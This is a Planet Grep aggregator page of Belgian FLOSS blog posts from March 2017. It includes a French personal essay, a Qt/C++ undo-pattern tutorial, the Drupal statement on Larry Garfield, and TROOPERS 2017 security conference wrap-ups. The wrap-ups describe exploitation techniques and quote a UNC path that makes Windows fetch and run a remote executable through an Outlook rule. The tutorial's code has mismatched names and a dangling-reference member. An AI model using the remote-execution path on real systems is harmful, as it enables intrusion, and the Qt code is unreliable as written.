Planet Grep

Planet'ing Belgian FLOSS people

Planet Grep is maintained by Wouter Verhelst. All times are in UTC.

March 26, 2017

Certaines histoires commencent mal. Très mal. Mais, petit à petit, la vie se fraie un chemin à travers les pires situations pour s’épanouir en frêles et merveilleux bourgeons.

Cette histoire commence le 7 janvier 2015. Ce jour là, je croise Damien Van Achter, atterré par ce qui se passe à Paris. Il me parle de morts. Je ne comprends pas. J’ouvre alors Twitter et découvre l’ampleur des attentats contre Charlie Hebdo.

Je ne le sais pas encore mais ces attentats vont changer ma vie. En bien. En incroyablement, merveilleusement bien.

Sur le moment, choqué à mon tour, je me fends d’un tweet immédiat, instinctif. Étant moi-même parfois auteur d’humour de mauvais goût, je me sens attaqué dans mes valeurs.

Ce tweet sera retweeté plus de 10.000 fois, publié dans les médias, à la télévision, dans un livre papier et, surtout, sur Facebook où il sera mis en image par Pierre Berget, repartagé et lu par des centaines de milliers de personnes.

Parmi elles, une jeune femme. Intriguée, elle se mettra à lire mon blog et m’enverra un paiement libre. Après m’avoir croisé par hasard à l’inauguration du coworking Rue du Web, elle me contactera sur Facebook pour discuter certaines de nos idées respectives.

Deux ans plus tard, le 9 mars 2017, jour de mon 36ème anniversaire, cette jeune femme dont je suis éperdument amoureux a donné naissance à Miniploum, mon fils. Le plus beau des cadeaux d’anniversaire…

Je souris, je savoure la vie et je suis heureux. Ce bonheur, cet amour que j’ai la chance de vivre, ne le dois-je pas en partie aux réseaux sociaux qui ont transformé un ignoble attentat en une nouvelle vie ?

Rappelons-nous que chaque drame, chaque catastrophe porte en elle les germes de futurs bonheurs. Des bonheurs qui ne font peut-être pas toujours les grands titres de la presse, qui sont moins vendeurs mais qui sont les fondations de chacune de nos vies.

Souvenons-nous également que les outils, quels qu’ils soient, ne deviennent que ce que nous en faisons. Ils ne sont ni bons, ni mauvais. Il est de notre responsabilité d’en faire des sources de bonheur…

Ce texte est a été publié grâce à votre soutien régulier sur Tipeee et sur Paypal. Je suis @ploum, blogueur, écrivain, conférencier et futurologue. Vous pouvez me suivre sur Facebook, Medium ou me contacter.

Ce texte est publié sous la licence CC-By BE.

March 24, 2017

I published the following diary on isc.sans.org: “Nicely Obfuscated JavaScript Sample“.

One of our readers sent us an interesting sample that was captured by his anti-spam. The suspicious email had an HTML file attached to it. By having a look at the file manually, it is heavily obfuscated and the payload is encoded in a unique variable… [Read more]

[The post [SANS ISC] Nicely Obfuscated JavaScript Sample has been first published on /dev/random]

Among the problems we’ll face is that we want asynchronous APIs that are undoable and that we want to switch to read only, undoable editing, non-undoable editing and that QML doesn’t really work well with QFuture. At least not yet. We want an interface that is easy to talk with from QML. Yet we want to switch between complicated behaviors.

We will also want synchronous mode and asynchronous mode. Because I just invented that requirement out of thin air.

Ok, first the “design”. We see a lot of behaviors, for something that can do something. The behaviors will perform for that something, the actions it can do. That is the strategy design pattern, then. It’s the one about ducks and wing fly behavior and rocket propelled fly behavior and the ostrich that has a can’t fly behavior. For undo and redo, we have the command pattern. We have this neat thing in Qt for that. We’ll use it. We don’t reinvent the wheel. Reinventing the wheel is stupid.

Let’s create the duck. I mean, the thing-editor as I will use “Thing” for the thing that is being edited. We want copy (sync is sufficient), paste (must be aysnc), and edit (must be async). We could also have insert and delete, but those APIs would be just like edit. Paste is usually similar to insert, of course. Except that it can be a combined delete and insert when overwriting content. The command pattern allows you to make such combinations. Not the purpose of this example, though.

Enough explanation. Let’s start! The ThingEditor, is like the flying Duck in strategy. This is going to be more or less the API that we will present to the QML world. It could be your ViewModel, for example (ie. you could let your ThingViewModel subclass ThingEditor).

class ThingEditor : public QObject
{
    Q_OBJECT

    Q_PROPERTY ( ThingEditingBehavior* editingBehavior READ editingBehavior
                 WRITE setEditingBehavior NOTIFY editingBehaviorChanged )
    Q_PROPERTY ( Thing* thing READ thing WRITE setThing NOTIFY thingChanged )

public:
    explicit ThingEditor( QSharedPointer<Thing> &a_thing,
            ThingEditingBehavior *a_editBehavior,
            QObject *a_parent = nullptr );

    explicit ThingEditor( QObject *a_parent = nullptr );

    Thing* thing() const { return m_thing.data(); }
    virtual void setThing( QSharedPointer<Thing> &a_thing );
    virtual void setThing( Thing *a_thing );

    ThingEditingBehavior* editingBehavior() const { return m_editingBehavior.data(); }
    virtual void setEditingBehavior ( ThingEditingBehavior *a_editingBehavior );

    Q_INVOKABLE virtual void copyCurrentToClipboard ( );
    Q_INVOKABLE virtual void editCurrentAsync( const QString &a_value );
    Q_INVOKABLE virtual void pasteCurrentFromClipboardAsync( );

signals:
    void editingBehaviorChanged ();
    void thingChanged();
    void editCurrentFinished( EditCurrentCommand *a_command );
    void pasteCurrentFromClipboardFinished( EditCurrentCommand *a_command );

private slots:
    void onEditCurrentFinished();
    void onPasteCurrentFromClipboardFinished();

private:
    QScopedPointer<ThingEditingBehavior> m_editingBehavior;
    QSharedPointer<Thing> m_thing;
    QList<QFutureWatcher<EditCurrentCommand*> *> m_editCurrentFutureWatchers;
    QList<QFutureWatcher<EditCurrentCommand*> *> m_pasteCurrentFromClipboardFutureWatchers;
};

For the implementation of this class, I’ll only provide the non-obvious pieces. I’m sure you can do that setThing, setEditingBehavior and the constructor yourself. I’m also providing it only once, and also only for the EditCurrentCommand. The one about paste is going to be exactly the same.

void ThingEditor::copyCurrentToClipboard ( )
{
    m_editingBehavior->copyCurrentToClipboard( );
}

void ThingEditor::onEditCurrentFinished( )
{
    QFutureWatcher<EditCurrentCommand*> *resultWatcher
            = static_cast<QFutureWatcher<EditCurrentCommand*>*> ( sender() );
    emit editCurrentFinished ( resultWatcher->result() );
    if (m_editCurrentFutureWatchers.contains( resultWatcher )) {
        m_editCurrentFutureWatchers.removeAll( resultWatcher );
    }
    delete resultWatcher;
}

void ThingEditor::editCurrentAsync( const QString &a_value )
{
    QFutureWatcher<EditCurrentCommand*> *resultWatcher
            = new QFutureWatcher<EditCurrentCommand*>();
    connect ( resultWatcher, &QFutureWatcher<EditCurrentCommand*>::finished,
              this, &ThingEditor::onEditCurrentFinished, Qt::QueuedConnection );
    resultWatcher->setFuture ( m_editingBehavior->editCurrentAsync( a_value ) );
    m_editCurrentFutureWatchers.append ( resultWatcher );
}

For QUndo we’ll need a QUndoCommand. For each undoable action we indeed need to make such a command. You could add more state and pass it to the constructor. It’s common, for example, to pass Thing, or the ThingEditor or the behavior (this is why I used QSharedPointer for those: as long as your command lives in the stack, you’ll need it to hold a reference to that state).

class EditCurrentCommand: public QUndoCommand
{
public:
    explicit EditCurrentCommand( const QString &a_value,
                                 QUndoCommand *a_parent = nullptr )
        : QUndoCommand ( a_parent )
        , m_value ( a_value ) { }
    void redo() Q_DECL_OVERRIDE {
       // Perform action goes here
    }
    void undo() Q_DECL_OVERRIDE {
      // Undo what got performed goes here
    }
private:
    const QString &m_value;
};

You can (and probably should) also make this one abstract (and/or a so called pure interface), as you’ll usually want many implementations of this one (one for every kind of editing behavior). Note that it leaks the QUndoCommand instances unless you handle them (ie. storing them in a QUndoStack). That in itself is a good reason to keep it abstract.

class ThingEditingBehavior : public QObject
{
    Q_OBJECT

    Q_PROPERTY ( ThingEditor* editor READ editor WRITE setEditor NOTIFY editorChanged )
    Q_PROPERTY ( Thing* thing READ thing NOTIFY thingChanged )

public:
    explicit ThingEditingBehavior( ThingEditor *a_editor,
                                   QObject *a_parent = nullptr )
        : QObject ( a_parent )
        , m_editor ( a_editor ) { }

    explicit ThingEditingBehavior( QObject *a_parent = nullptr )
        : QObject ( a_parent ) { }

    ThingEditor* editor() const { return m_editor.data(); }
    virtual void setEditor( ThingEditor *a_editor );
    Thing* thing() const;

    virtual void copyCurrentToClipboard ( );
    virtual QFuture<EditCurrentCommand*> editCurrentAsync( const QString &a_value, bool a_exec = true );
    virtual QFuture<EditCurrentCommand*> pasteCurrentFromClipboardAsync( bool a_exec = true );

protected:
    virtual EditCurrentCommand* editCurrentSync( const QString &a_value, bool a_exec = true );
    virtual EditCurrentCommand* pasteCurrentFromClipboardSync( bool a_exec = true );

signals:
    void editorChanged();
    void thingChanged();

private:
    QPointer<ThingEditor> m_editor;
    bool m_synchronous = true;
};

That setEditor, the constructor, etc: these are too obvious to write here. Here are the non-obvious ones:

void ThingEditingBehavior::copyToClipboard ( )
{
}

EditCurrentCommand* ThingEditingBehavior::editCurrentSync( const QString &a_value, bool a_exec )
{
    EditCurrentCommand *ret = new EditCurrentCommand ( a_value );
    if ( a_exec )
        ret->redo();
    return ret;
}

QFuture<EditCurrentCommand*> ThingEditingBehavior::editCurrentAsync( const QString &a_value, bool a_exec )
{
    QFuture<EditCurrentCommand*> resultFuture =
            QtConcurrent::run( QThreadPool::globalInstance(), this,
                               &ThingEditingBehavior::editCurrentSync,
                               a_value, a_exec );
    if (m_synchronous)
        resultFuture.waitForFinished();
    return resultFuture;
}

And now we can make the whole thing undoable by making a undoable editing behavior. I’ll leave a non-undoable editing behavior as an exercise to the reader (ie. just perform redo() on the QUndoCommand, don’t store it in the QUndoStack and immediately delete or cmd->deleteLater() the instance).

Note that if m_synchronous is false, that (all access to) m_undoStack, and the undo and redo methods of your QUndoCommands, must be (made) thread-safe. The thread-safety is not the purpose of this example, though.

class UndoableThingEditingBehavior : public ThingEditingBehavior
{
    Q_OBJECT
public:
    explicit UndoableThingEditingBehavior( ThingEditor *a_editor,
                                           QObject *a_parent = nullptr );
protected:
    EditCellCommand* editCurrentSync( const QString &a_value, bool a_exec = true ) Q_DECL_OVERRIDE;
    EditCurrentCommand* pasteCurrentFromClipboardSync( bool a_exec = true ) Q_DECL_OVERRIDE;
private:
    QScopedPointer<QUndoStack> m_undoStack;
};

EditCellCommand* UndoableThingEditingBehavior::editCurrentSync( const QString &a_value, bool a_exec )
{
    Q_UNUSED(a_exec)
    EditCellCommand *undoable = ThingEditingBehavior::editCurrentSync(  a_value, false );
    m_undoStack->push( undoable );
    return undoable;
}

EditCellCommand* UndoableThingEditingBehavior::pasteCurrentFromClipboardSync( bool a_exec )
{
    Q_UNUSED(a_exec)
    EditCellCommand *undoable = ThingEditingBehavior::pasteCurrentFromClipboardSync( false );
    m_undoStack->push( undoable );
    return undoable;
}

March 23, 2017

I’m just back from Heidelberg so here is the last wrap-up for the TROOPERS 2017 edition. This day was a little bit more difficult due to the fatigue and the social event of yesterday. That’s why the wrap-up will be shorter…  The second keynote was presented by Mara Tam: “Magical thinking … and how to thwart it”. Mara is an advisor to executive agencies on information security issues. Her job focuses on the technical and strategic implications of regulatory and policy activity. In my opinion, the keynote topic remained classic. Mara explained her vision of the problems that the infosec community is facing when information must be exchanged with “the outside world”. Personally, I found that Mara’s slides were difficult to understand. 

For the first presentation of the day, I stayed in the main room – the offensive track – to follow “How we hacked distributed configuration management systems” by Francis Alexander and Bharadwaj Machhiraju. As we already saw yesterday with the SDN, automation is a hot topic and companies tend to install specific tools to automate the configuration tasks. Such software is called DCM or “Distributed Configuration Management”. They simplify the maintenance of complex infrastructures, the synchronization and service discovery. But, as software, they also have bugs or vulnerabilities and are, for a pentester, a nice target. They’re real goldmines because they content not only configuration files but if the attacker can change them, it’s even more dangerous. DCM can be agent-less or -based on agents. This is the second case that was the target of Francis & Bharadwaj. They reviewed three tools:

  • HashiCorp Consul
  • Apache Zookeeper
  • CoreOS etcd

For each tool, that explained the vulnerability they found and how it was exploited up to remote code execution. The crazy story is that all of them do not have authentication enabled by default! To automate the search for DCM and exploitation, they developed a specific tool called Garfield. Nice demos were performed during the talk with many remote shells and calc.exe spawned here and there.

The next talk was my favourite of today. It was about a tool called Ruller to pivot through Exchange servers. Etienne Stamens presented his research on Microsoft Exchange and how he reverse engineered the protocol. The goal is just to get a shell though Exchange. The classic phases of an attack were reviewed:

  • Reconnaissance
  • Exploitation
  • Persistence (always better!)

Basically, Exchange is a mail server but many more features are available: calendar, Lync, Skype, etc. Exchange must be able to serve local and remote users so it exposes services on the Internet. How do identify companies that use an Exchange server and how to find it? Simply thanks to the auto-discovery feature that is implemented by Microsoft. If your domain is company.com, Outlook will search for https://company.com/autodiscover/autodiscover.xml (+ other alternatives URLs if this one isn’t useful). Etienne did some research and found that 10% of the Internet domains have this process enabled. After some triage, he found that approximatively 26000 domains are linked to an Exchange server. Nice attack surface! The next step is to compromise at least one account. Here, classic methods can be used (brute-force, rogue wireless AP, phishing or dumps of leaked databases). The exploitation in itself is performed by creating a rule that will execute a script. The rule looks like “When the word “pwned” is present in the subject, start “badprogram.exe”. A very nice finding is the way Windows converts UNC path to webdav:

\\host.com@SSL\webdav\pew.zip\s.exe

will be converted to:

https://host.com/webdab/pew.zip

And Windows will even extract s.exe for you! Magic!

Etienne performed a nice demo of Ruler which automates all the process described above. Then, he demonstrated another tool called Linial which takes care of the persistence. To conclude, Etienne explained briefly how to harden Exchange to prevent this kind of attack. Outlook 2016 blocks unsafe rules by default which is good. An alternative is to block WebDAV and use MFA.

After the lunch, Zoz came back with another funny presentation: “Data Demolition: Gone in 60 seconds!”. The idea is simple: When you throw away some devices, you must be sure that they don’t contain remaining critical data. Classic examples are HD’s and printers. Also extremely mobiles devices like drones. The talk was some kind of a “Myth Busters” show for hard drives! Different techniques were tested by Zoz:

  • Thermal
  • Kinetic
  • Electric

For each of them, different scenarios were presented and the results demonstrated with small videos. Crazy!

Destroying HD's

What was interesting to notice is that most techniques failed because the disk plates could still be “cleaned” (ex: removing the dust) and become maybe readable by using forensic techniques. For your information, the most feasible techniques were: Plasma cutter or oxygen injector, nailguns and HV Power spike. Just one advice: don’t try this at home!

There was a surprise talk scheduled. The time slot was offered to The Grugq. Renowned security researcher, he presented “Surprise Bitches, Enterprise Security Lessons From Terrorists”. He talked about APT’s but not as a buzzword. He gave his own view of how APT’s work. For him, the term “APT” was invented by Americans and means: “Asia Pacific Threat“.

I finished the day back to offensive track. Mike Ossmann and Dominic Spill from Great Scott Gadgets presented “Exploring the Infrared, part 2“. The first part was presented at Schmoocon. Hopefully, they started with a quick recap. What is the infrared light and its applications (remote control, sensors, communications, heating systems, …). The talk was a suite of nice demos where they use replay attack techniques to abuse of tools/toys that work with IR like a Dunk Hunt game, a shark remote controller. The most impressive one was the replay attack against the Bosh audio transmitter. This very expensive device is used in big events for instant translations. They were able to reverse engineer the protocol and were able to play a song through the device… You can imagine the impact of such attack in a live event (ex: switching voices, replacing translations by others, etc). They have many more tests in the pipe.

IR Fun

The last talk was “Blinded Random Block Corruption” by Rodrigo Branco. Rodrigo is a regular speaker at TROOPERS and provides always good content. His presentation was very impressive. They idea is to evaluate the problems around memory encryption? How and why to use it? Physical access to the victim is the worse case. An attacker has access to anything. You implemented full-disk encryption? Cool but many info are in the memory when the system is running. Access to memory can be performed via Firewire, PCIe, PCMCIA and new USB standards. What about memory encryption? It’s good but encryption alone is not enough. Controls must be implemented. The attack explained by Rodrigo is called “BRBC” or  “Blinded Random Block Corruption“. After giving the details, a nice demo was realized: how to become root on a locked system? Access to the memory is more easy in virtualized (or cloud) environments. Indeed many hypervisors allow enabling a “debug” feature per VM. Once activated, the administrator has write access to the memory. By using a debugger, you can use the BRBC attack and bypass the login procedure. The video demo was impressive.

So, TROPPER 10th anniversary edition is over. I spend four awesome days attending nice talks and meeting a lot of friends (old & new). I learned a lot and my todo-list already expanded.

 

[The post TROOPERS 2017 Day #4 Wrap-Up has been first published on /dev/random]

The Drupal community is committed to welcome and accept all people. That includes a commitment to not discriminate against anyone based on their heritage or culture, their sexual orientation, their gender identity, and more. Being diverse has strength and as such we work hard to foster a culture of open-mindedness toward differences.

A few weeks ago, I privately asked Larry Garfield, a prominent Drupal contributor, to leave the Drupal project. I did this because it came to my attention that he holds views that are in opposition with the values of the Drupal project.

I had hoped to avoid discussing this decision publicly out of respect for Larry's private life, but now that Larry has written about it on his blog and it is being discussed publicly, I believe I have no choice but to respond on behalf of the Drupal project.

It's not for me to judge the choices anyone makes in their private life or what beliefs they subscribe to. I also don't take any offense to the role-playing activities or sexual preferences of Larry's alternative lifestyle.

What makes this difficult to discuss, is that it is not for me to share any of the confidential information that I've received, so I won't point out the omissions in Larry's blog post. However, I can tell you that those who have reviewed Larry's writing, including me, suffered from varying degrees of shock and concern.

In the end, I fundamentally believe that all people are created equally. This belief has shaped the values that the Drupal project has held since it's early days. I cannot in good faith support someone who actively promotes a philosophy that is contrary to this. The Gorean philosophy promoted by Larry is based on the principle that women are evolutionarily predisposed to serve men and that the natural order is for men to dominate and lead.

While the decision was unpleasant, the choice was clear. I remain steadfast in my obligation to protect the shared values of the Drupal project. This is unpleasant because I appreciate Larry's many contributions to Drupal, because this risks setting a complicated precedent, and because it involves a friend's personal life. The matter is further complicated by the fact that this information was shared by others in a manner I don't find acceptable either and will be dealt with separately.

However, when a highly-visible community member's private views become public, controversial, and disruptive for the project, I must consider the impact that his words and actions have on others and the project itself. In this case, Larry has entwined his private and professional online identities in such a way that it blurs the lines with the Drupal project. Ultimately, I can't get past the fundamental misalignment of values.

Collectively, we work hard to ensure that Drupal has a culture of diversity and inclusion. Our goal is not just to have a variety of different people within our community, but to foster an environment of connection, participation and respect. We have a lot of work to do on this and we can't afford to ignore discrepancies between the espoused views of those in leadership roles and the values of our culture. It's my opinion that any association with Larry's belief system is inconsistent with our project's goals.

It is my responsibility and obligation to act in the best interest of the project at large and to uphold our values. Decisions like this are unpleasant and disruptive, but important. It is moments like this that test our commitment to our values. We must stand up and act in ways that demonstrate these values. For these reasons, I'm asking Larry to resign from the Drupal project.

Update March 24

After reading hundreds of responses, I wanted to make a clarifying statement. First, I made the decision to ask Larry not to participate in the Drupal project, and separately, the Drupal Association made a decision not to invite Larry to speak at DrupalCon Baltimore or serve as a track chair for it. I can only speak to my decision-making here. It's worth noting that I recused myself from the Drupal Association's decision.

Many have rightfully stated that I haven't made a clear case for the decision. When one side chooses to make their case public it creates an imbalance of information. Only knowing one side skews public opinion heavily towards the publicized viewpoint. While I will not share the evidence that I believe would validate the decision that I made for reasons of liability and confidentiality, I will say that I did not make the decision based on the information or beliefs conveyed in Larry's blog post.

Larry accurately pointed out that some of the evidence was brought forth in a manner that is not in alignment with Drupal values. This manner is being addressed with the CWG. While it's disheartening that some of our community members chose the approach they did to bring the matter regarding Larry forward, that does not change the underlying facts that informed my decision.

(Comments on this post are allowed but for obvious reasons will be moderated.)

Perfection has been reached not when there is nothing left to add, but when there is nothing left to take away.

March 22, 2017

The third day is already over! Today the regular talks were scheduled split in three tracks: offensive, defensive and a specific one dedicated to SAP. The first slot at 09:00 was, as usual, a keynote. Enno Rey presented ten years of TROOPERS. What happened during all those editions? The main ideas behind TROOPERS have always been that everybody must learn something by attending the conference but… with fun and many interactions with other peers! The goal was to mix infosec people coming from different horizons. And, of course, to use the stuff learned to contribute back to the community. Things changed a lot during these ten years, some are better while others remain the same (or worse?). Enno reviewed all the keynotes presented and, for each of them, gave some comments – sometimes funny. The conference in itself also evolved with a SAP track, the Telco Sec Day, the NGI track and when they move to Heidelberg. Some famous vulnerabilities were covered like MS08-067 or the RSA hack. What we’ve seen:

  • A move from theory to practice
  • Some things/crap that stay the same (same shit, different day)
  • A growing importance of the socio-economic context around security.

Has progress been made? Enno reviewed infosec in three dimensions:

  • As a (scientific) discipline: From theory to practice. So yes, progress has been made
  • In enterprise environments: Some issues on endpoints have been fixed but there is a fact: Windows security has become much better but now they use Android :). Security in Datacenter also improved but now there is the cloud. 🙂
  • As a constituent for our society: Complexity is ever growing.

Are automated systems the solution? They are still technical and human factors that are important “Errare Humanum Est” said Enno. Information security is still in progress but we have to work for it. Again, the examples of the IoT crap was used. Education is key. So, yes, the TROOPERS motto is still valid: “Make the world a better place”. Based on the applause from the audience, this was a great keynote by an affected Enno!

I started my day within the defensive track. Veronica Valeros presented “Hunting Them All”. Why do we need hunting capabilities? A definition of threat hunting is “to help in spotting attacks that would pass our existing controls and make more damages to the business“.

Veronica's Daily Job: Hunting!

People are constantly hit by threats (spam, phishing, malware, trojans, RATs, … you name them). Being always online also increases our surface attack. Attacks are very lucrative and attract a lot of bad guys. Sometimes, malware may change things. A good example comes with the ransomware plague: it made people aware that backups are critical. Threat hunting is not easy because when you are sitting on your network, you don’t always know what to search. And malicious activity does not always rely on top-notch technologies. Attackers are not all ‘l33t’. They just want to bypass controls and make their malicious code run. To achieve this, they have a lot of time, they abuse the weakest link and they hide in plain sight. To resume: they use the “less effort rule”. Which sound legit, right? Veronica has access to a lot of data. Her team is performing hunting across hundreds of networks, millions of users and billions of web requests. How to process this? Machine learning came to the rescue. And Veronica’s job is to check and validate the output of the machine learning process they developed. But it’s not a magic tool that will solve all issues. The focus must be given on what’s important: from 10B of requests/day to 20K incidents/day using anomaly detection, trust modelling, event classification, entity & user modelling. Veronica gave an example. The botnet Sality is active since 2003 and still present. IOC’s exists but they generate a lot of false positives. Regular expressions are not flexible enough. Can we create algorithms to automatically track malicious behaviour. For some threats, it works, for others no. Veronica’s team is tracking +200 malicious behaviours and 60% is automated tracking. “Let the machine do the machine work”. As a good example, Veronica explained how referrers can be the source of important data leaks from corporate networks.

My next choice was “Securing Network Automation” by Ivan Peplnjak. In a previous talk, Ivan explained why Software Defined Networks failed but many vendors improved, which is good. So today, his new topic was about ways to improve the automation from a security perspective. Indeed, we must automate as much as possible but how to make it reliable and secure? If a process is well defined, it can be automated as said Ivan. Why automate? From a management perspective, the same reasons come always on the table: increase the flexibility while reducing costs, to have faster deployments and complete for public cloud offering. About the cloud, do we need to buy or to build? In all cases, you’ll have to build if you want to automate. The real challenge is to move quickly from development to test and production. To achieve this, instead of editing a device configuration live, create configuration text files, push them to a gitlab server. Then you can virtualise a lab, pull config and test them. Did it work? Then merge with the main branch. A lot can be automated: device provisioning, VLANs management, ACLs, firewall rules. But the challenge is to have strong controls to prevent issues upfront and troubleshoot if needed. A nice quote was:

“To make mistake is human, to automatically deploy mistake to all the servers use DevOps”

You remember the amazon bad story? Be prepared to face issues. To automate, you need tools and such tool must be secure. An example was given with Ansible. The issues are that it gathers information from untrusted source:

  • Scripts are executed on managed devices: what about data injection?
  • Custom scripts are included in data gathering: More data injection?
  • Returned data are not properly parsed: Risk of privilege escalation?

The usual controls to put in place are:

  • OOB management
  • Management network / VR
  • Limit access to the management hosts
  • SSH-based access
  • Use SSH keys
  • RBAC (commit scripts)

Keep in mind: Your network is critical so automatic (network programming) is too. Don’t write code yourself (hire a skilled Python programmer for this task) but you must know what the code should do. Test, test, test and once done, test again. As an example of control, you can perform a trace route before / after the change and compare the path. Ivan published a nice list of requirements for your vendor while looking for a new network device. If your current vendor cannot provide you basic requirements like an API, change it!

After the lunch, back to the defence & management track with “Vox Ex Machina” by Grame Neilson. The title looked interesting, was it more offensive of defensive content? Voice recognition is more and more used (example: Cortana, Siri, etc) but also on non-IT systems like banking or support system: “Press 1 for X or press 2 for Y”. But is it secure? Voice recognition is not a new hipe. There are references to the “Voder” already in 1939. Another system was the Vocoder a few years later. Voice recognition is based on two methods: phrase dependent or independent (the current talk will focus on the first method). The process is split in three phases:

  • Enrolment: your record a phrase x times. It must be different and the analysis is stored as a voice print.
  • Authentication: Based on feature extraction or MFCC (Mel-Frequency Cepstrum Correlation).
  • Confidence: Returned as a percentage.

The next part of the talk focused on the tool developed by Grame. Written in Python, it tests a remote API. The different supported attacks are: replay, brute-force and voice print fixation. An important remark made by Grame: Event if some services pretend it, your voice is NOT a key! Every time you pronounce “word”, the generated file is different. That’s why the process of brute-forcing is completely different with voice recognition: You know when you are getting closer due to the returned confidence  (in %) instead of a password comparison which returns “0” or “1”. The tool developed by Grame is available here (or will be soon after the conference).

The next talk was presented by Matt Grabber and Casey Smith: “Architecting a Modern Defense using Device Guard”. The talk was scheduled on the defensive track but it covered both worlds. The question that interest many people is: Is whitelisting a good solution? Bad guys are trying to find bypass strategies (red teams). What are the mitigations available for the blue teams? The attacker’s goal is clear: execute HIS code on YOUR computer. They are two types of attackers: the one who knows what controls you have in place (enlightened) and the novices who aren’t equipped to handle your controls (ex: the massive phishing campaigns dropping Office documents with malicious macros). Device Guard offers the following protections:

  • Prevents unauthorised code execution,
  • Restricted scripting environment
  • Prevents policy tempering and virtualisation based security

The speakers were honest: Device Guard does NOT protect against all the threats but it increases the noises (evidence). Bypasses are possible. how?

  • Policy misconfiguration
  • Misplaced trust
  • Enlightened scripting environments
  • Exploitation of vulnerable code
  • Implementation flaws

The way you deploy your policy depends on your environment is a key but also depends on the security eco-system where we are living. Would you trust all code signed by Google? Probably yes. Do you trust any certificate issued by Symantec? Probably not. The next part o the talk was a review of the different bypass techniques (offensive) and them some countermeasures (defensive). A nice demo was performed with Powershell to bypass the language constraint mode. Keep in mind that some allowed applications might be vulnerable. Do you remember the VirtualBox signed driver vulnerability? Besides those problems, Device Guard offers many advantages:

  • Uncomplicated deployment
  • DLL enforcement implicit
  • Supported across windows ecosystem
  • Core system component
  • Powershell integration

Conclusion: whitelisting is often a huge debate (pro/con). Despite the flaws, it forces the adversaries to reset their tactics. By doing this you disrupt the attackers’ economics: if it makes the system harder to compromise, it will cost the more time/money.

After the afternoon coffee break, I switched to the offensive track again to follow Florian Grunow and Niklaus Schuss who presented “Exploring North Korea’s Surveillance Technology”. I had no idea about the content of the talk but it was really interesting and an eye-opener! It’s a fact:  If it’s locked down, it must be interesting. That’s why Florian and Niklaus performed a research on the systems provided to DPRK citizens (“Democratic People’s Republic of Korea“). The research was based on papers published by others and devices / operating systems leaked. They never went over there. The motivation behind the research was to get a clear view of the surveillance and censorship put in place by the government. It started with the Linux distribution called “Red Star OS”. It is based on Fedora/KDE via multiple version and looks like a modern Linux distribution but… First finding: certificates installed in the browser are all coming from the Korean authorities. Also, some suspicious processes cannot be killed. Integrity checks are performed on system files and downloaded files are changed on the fly by the OS (example: files transferred via an USB storage). The OS adds a watermark at the end of the file which helps to identify the computer which was used. If the file is transferred to another computer, a second watermark is added, etc. This is a nice method to track dissidents and to build a graph of relations between them. Note that this watermark is added only on data files and that it can easily be removed. An antivirus is installed but can also be used to deleted files based on their hash. Of course, the AV update servers are maintained by the government. After the desktop OS, the speakers reviewed some “features” installed on the “Woolim” tablet. This device is based on Android and does not have any connectivity onboard. You must use specific USB dongle for this (provided by the government of course). When you try to open some files, you get a warning message “This is not signed file”. Indeed, the tablet can only work with files signed by the government or locally (based on RSA signatures). The goal, here again, is to prevent the distribution of media files. From a network perspective, there is no direct Internet access and all the traffic is routed through proxies. An interesting application running on the tablet is called “TraceViewer”. It takes a screenshot of the tablet at regular interval. The user cannot delete the screenshots and random physical controls can be performed by authorities to keep the pressure on the citizens. This talk was really an eye-opener for me. Really crazy stuff!

Finally, my last choice was another defensive track: “Arming Small Security Programs” by Matthew Domko. The idea is to generate a network baseline, exactly like we do for applications on Windows. For many organizations, the problem is to detect malicious activity on your network. Using an IDS becomes quickly unuseful due to the amount and the limitation of signatures. Matthew’s idea was to:

  • Build a baseline (all IPs, all ports)
  • Write snort rules
  • Monitor
  • Profit

To achieve this, he used the tool Bro. Bro is some kind of Swiss army knife for IDS environments. Matthew made a quick introduction to the tool and, more precisely, focussed on the scripting capabilities of Bro. Logs produced by Bro are also easy to parse. The tool developed by Matthew implements a simple baseline script. It collects all connections to IP addresses / ports and logs what is NOT know. The tool is called Bropy and should be available soon after the conference. A nice demo was performed. I really liked the idea behind this tool but it should be improved and features added to be used on big environments. I would recommend having a look at it if you need to build a network activity baseline!

The day ended with the classic social event. Local food, drinks and nice conversations with friends, which is priceless. I have to apologize for the delay to publish this wrap-up. Complaints can be sent to Sn0rkY! 😉

[The post TROOPERS 2017 Day #3 Wrap-Up has been first published on /dev/random]

March 21, 2017

This is my wrap-up for the 2nd day of “NGI” at TROOPERS. My first choice for today was “Authenticate like a boss” by Pete Herzog. This talk was less technical than expected but interesting. It focussed on a complex problem: Identification. It’s not only relevant for users but for anything (a file, an IP address, an application, …). Pete started by providing a definition. Authentication is based on identification and authorisation. But identification can be easy to fake. A classic example is the hijacking of a domain name by sending a fax with a fake ID to the registrar – yes, some of them are still using fax machines! Identification is used at any time to ensure the identity of somebody to give access to something. It’s not only based on credentials or a certificate.

Identification is extremely important. You have to distinguish the good and bad at any time. Not only people but files, IOC’s, threat intelligence actors, etc. For files, metadata can help to identify. Another example reported by Pete: the attribution of an attack. We cannot be 100% confident about the person or the group behind the attack.The next generation Internet needs more and more identification. Especially with all those IoT devices deployed everywhere. We don’t even know what the device is doing. Often, the identification process is not successful. How many times did you send a “hello” to somebody that was not the right person on the street or while driving? Why? Because we (as well as objects) are changing. We are getting older, wearing glasses, etc…  Every interaction you have in a process increases your attack surface the same amount as one vulnerability.  What is more secure? Let a user choose his password or generate a strong one for him? He’ll not remember ours and write it down somewhere. In the same way, what’s best? a password or a certificate? An important concept explained by Pete is the “intent”. The problem is to have a good idea of the intent (from 0 – none – to 100% – certain).

Example: If an attacker is filling your firewall state table, is it a DoS attack? If somebody is performed a traceroute to your IP addresses, is it a foot-printing? Can be a port scan automatically categorized as hunting? And a vulnerability scan will be immediately followed by an attempt to exploit? Not always… It’s difficult to predict specific action. To conclude, Pete mentioned machine learning as a tool that may help in the indicators of intent.

After an expected coffee break, I switched to the second track to follow “Introduction to Automotive ECU Research” by Dieter Spaar. ECU stands for “Electronic Control Unit”. It’s some kind of brain present in modern cars that helps to control the car behaviour and all its options. The idea of the research came after the problem that BMW faced with the unlock of their cars. Dieter’s Motivations were multiple: engine tuning, speedometer manipulation, ECU repair, information privacy (what data are stored by a car?), the “VW scandal” and eCall (Emergency calls). Sometimes, some features are just a question of ECU configuration. They are present but not activated. Also, from a privacy point of view, what infotainment systems collect from your paired phone? How much data is kept by your GPS? ECU’s depend on the car model and options. In the picture below, yellow  blocks are ECU activated, others (grey) are optional (this picture is taken from an Audi A3 schema):

Audi A3 ECU

